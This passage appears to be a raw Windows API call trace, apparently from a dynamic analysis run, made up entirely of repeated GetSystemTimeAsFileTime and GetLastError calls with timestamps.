GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184e7590, dwHighDateTime=0x1d4be3b)) [0201.644] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184e7590, dwHighDateTime=0x1d4be3b)) [0201.644] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184e7590, dwHighDateTime=0x1d4be3b)) [0201.644] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184e7590, dwHighDateTime=0x1d4be3b)) [0201.644] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184e7590, dwHighDateTime=0x1d4be3b)) [0201.644] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184e7590, dwHighDateTime=0x1d4be3b)) [0201.644] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184e7590, dwHighDateTime=0x1d4be3b)) [0201.644] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184e7590, dwHighDateTime=0x1d4be3b)) [0201.644] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184e7590, dwHighDateTime=0x1d4be3b)) [0201.644] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184e7590, dwHighDateTime=0x1d4be3b)) [0201.644] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184e7590, dwHighDateTime=0x1d4be3b)) [0201.644] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184e7590, dwHighDateTime=0x1d4be3b)) [0201.644] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184e7590, dwHighDateTime=0x1d4be3b)) [0201.644] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184e7590, dwHighDateTime=0x1d4be3b)) [0201.644] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184e7590, dwHighDateTime=0x1d4be3b)) [0201.644] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184e7590, dwHighDateTime=0x1d4be3b)) [0201.644] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184e7590, dwHighDateTime=0x1d4be3b)) [0201.644] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184e7590, dwHighDateTime=0x1d4be3b)) [0201.644] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184e7590, dwHighDateTime=0x1d4be3b)) [0201.644] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184e7590, dwHighDateTime=0x1d4be3b)) [0201.644] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184e7590, dwHighDateTime=0x1d4be3b)) [0201.644] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184e7590, dwHighDateTime=0x1d4be3b)) [0201.645] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184e7590, dwHighDateTime=0x1d4be3b)) [0201.645] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184e7590, dwHighDateTime=0x1d4be3b)) [0201.645] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184e7590, dwHighDateTime=0x1d4be3b)) [0201.645] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184e7590, dwHighDateTime=0x1d4be3b)) [0201.645] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184e7590, dwHighDateTime=0x1d4be3b)) [0201.645] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184e7590, dwHighDateTime=0x1d4be3b)) [0201.645] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184e7590, dwHighDateTime=0x1d4be3b)) [0201.645] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184e7590, dwHighDateTime=0x1d4be3b)) [0201.645] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184e7590, dwHighDateTime=0x1d4be3b)) [0201.645] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184e7590, dwHighDateTime=0x1d4be3b)) [0201.645] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184e7590, dwHighDateTime=0x1d4be3b)) [0201.645] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184e7590, dwHighDateTime=0x1d4be3b)) [0201.645] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184e7590, dwHighDateTime=0x1d4be3b)) [0201.645] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184e7590, dwHighDateTime=0x1d4be3b)) [0201.645] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184e7590, dwHighDateTime=0x1d4be3b)) [0201.645] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184e7590, dwHighDateTime=0x1d4be3b)) [0201.645] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184e7590, dwHighDateTime=0x1d4be3b)) [0201.645] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184e7590, dwHighDateTime=0x1d4be3b)) [0201.645] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184e7590, dwHighDateTime=0x1d4be3b)) [0201.645] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184e7590, dwHighDateTime=0x1d4be3b)) [0201.646] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184e7590, dwHighDateTime=0x1d4be3b)) [0201.646] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184e7590, dwHighDateTime=0x1d4be3b)) [0201.646] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184e7590, dwHighDateTime=0x1d4be3b)) [0201.646] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184e7590, dwHighDateTime=0x1d4be3b)) [0201.646] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184e7590, dwHighDateTime=0x1d4be3b)) [0201.889] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.889] GetLastError () returned 0x0 [0201.889] SetLastError (dwErrCode=0x0) [0201.889] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.889] GetLastError () returned 0x0 [0201.890] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.890] GetLastError () returned 0x0 [0201.890] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.890] GetLastError () returned 0x0 [0201.890] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.890] GetLastError () returned 0x0 [0201.890] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.890] GetLastError () returned 0x0 [0201.890] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.890] GetLastError () returned 0x0 [0201.890] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.890] GetLastError () returned 0x0 [0201.890] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.890] GetLastError () returned 0x0 [0201.890] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.890] GetLastError () returned 0x0 [0201.890] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.890] GetLastError () returned 0x0 [0201.890] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.890] GetLastError () returned 0x0 [0201.890] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.890] GetLastError () returned 0x0 [0201.890] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.890] GetLastError () returned 0x0 [0201.890] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.891] GetLastError () returned 0x0 [0201.891] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.891] GetLastError () returned 0x0 [0201.891] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.891] GetLastError () returned 0x0 [0201.891] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.891] GetLastError () returned 0x0 [0201.891] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.891] GetLastError () returned 0x0 [0201.891] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.891] GetLastError () returned 0x0 [0201.891] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.891] GetLastError () returned 0x0 [0201.891] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.891] GetLastError () returned 0x0 [0201.891] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.891] GetLastError () returned 0x0 [0201.891] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.891] GetLastError () returned 0x0 [0201.891] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.891] GetLastError () returned 0x0 [0201.891] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.891] GetLastError () returned 0x0 [0201.891] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.891] GetLastError () returned 0x0 [0201.891] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.891] GetLastError () returned 0x0 [0201.891] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.891] GetLastError () returned 0x0 [0201.892] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.892] GetLastError () returned 0x0 [0201.892] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.892] GetLastError () returned 0x0 [0201.892] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.892] GetLastError () returned 0x0 [0201.892] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.892] GetLastError () returned 0x0 [0201.892] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.892] GetLastError () returned 0x0 [0201.892] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.892] GetLastError () returned 0x0 [0201.892] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.892] GetLastError () returned 0x0 [0201.892] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.892] GetLastError () returned 0x0 [0201.892] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.892] GetLastError () returned 0x0 [0201.892] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.892] GetLastError () returned 0x0 [0201.892] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.892] GetLastError () returned 0x0 [0201.892] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.892] GetLastError () returned 0x0 [0201.892] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.892] GetLastError () returned 0x0 [0201.892] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.892] GetLastError () returned 0x0 [0201.892] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.892] GetLastError () returned 0x0 [0201.892] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.893] GetLastError () returned 0x0 [0201.893] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.893] GetLastError () returned 0x0 [0201.893] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.893] GetLastError () returned 0x0 [0201.893] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.893] GetLastError () returned 0x0 [0201.893] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.893] GetLastError () returned 0x0 [0201.893] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.893] GetLastError () returned 0x0 [0201.893] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.893] GetLastError () returned 0x0 [0201.893] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.893] GetLastError () returned 0x0 [0201.893] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.893] GetLastError () returned 0x0 [0201.893] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.893] GetLastError () returned 0x0 [0201.893] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.893] GetLastError () returned 0x0 [0201.893] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.893] GetLastError () returned 0x0 [0201.893] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.893] GetLastError () returned 0x0 [0201.893] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.893] GetLastError () returned 0x0 [0201.893] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.893] GetLastError () returned 0x0 [0201.893] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.893] GetLastError () returned 0x0 [0201.894] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.894] GetLastError () returned 0x0 [0201.894] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.894] GetLastError () returned 0x0 [0201.894] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.894] GetLastError () returned 0x0 [0201.894] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.894] GetLastError () returned 0x0 [0201.894] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.894] GetLastError () returned 0x0 [0201.894] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.894] GetLastError () returned 0x0 [0201.894] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.894] GetLastError () returned 0x0 [0201.894] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.894] GetLastError () returned 0x0 [0201.894] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.894] GetLastError () returned 0x0 [0201.894] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.894] GetLastError () returned 0x0 [0201.894] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.894] GetLastError () returned 0x0 [0201.894] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.894] GetLastError () returned 0x0 [0201.894] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.894] GetLastError () returned 0x0 [0201.894] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.894] GetLastError () returned 0x0 [0201.894] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.894] GetLastError () returned 0x0 [0201.895] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.895] GetLastError () returned 0x0 [0201.895] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.895] GetLastError () returned 0x0 [0201.895] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.895] GetLastError () returned 0x0 